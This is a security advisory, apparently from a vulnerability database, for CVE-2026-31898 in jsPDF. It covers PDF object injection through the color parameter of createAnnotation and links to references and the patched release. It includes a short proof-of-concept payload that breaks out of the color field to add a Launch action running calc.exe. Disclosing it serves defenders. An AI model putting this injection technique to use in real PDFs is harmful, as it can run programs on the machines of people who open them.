CVE-2026-31898: jsPDF has a PDF Object Injection via FreeText color
(updated )
User control of arguments of the createAnnotation method allows users to inject arbitrary PDF objects, such as JavaScript actions.
If given the possibility to pass unsanitized input to the following method, a user can inject arbitrary PDF objects, such as JavaScript actions, which might trigger when the PDF is opened or interacted with..
createAnnotation:colorparameter
Example attack vector:
import { jsPDF } from 'jspdf'
const doc = new jsPDF();
const payload = '000000) /AA <</E <</S /Launch /F (calc.exe)>>>> (';
doc.createAnnotation({
type: 'freetext',
bounds: { x: 10, y: 10, w: 120, h: 20 },
contents: 'hello',
color: payload
});
doc.save('test.pdf');
References
- github.com/advisories/GHSA-7x6v-j9x4-qf24
- github.com/parallax/jsPDF
- github.com/parallax/jsPDF/blob/b1607a9391d4cd65ea7ade25998aea8345ae1be3/src/modules/annotations.js
- github.com/parallax/jsPDF/commit/4155c4819d5eca284168e51e0e1e81126b4f14b8
- github.com/parallax/jsPDF/releases/tag/v4.2.1
- github.com/parallax/jsPDF/security/advisories/GHSA-7x6v-j9x4-qf24
- nvd.nist.gov/vuln/detail/CVE-2026-31898
Code Behaviors & Features
Detect and mitigate CVE-2026-31898 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →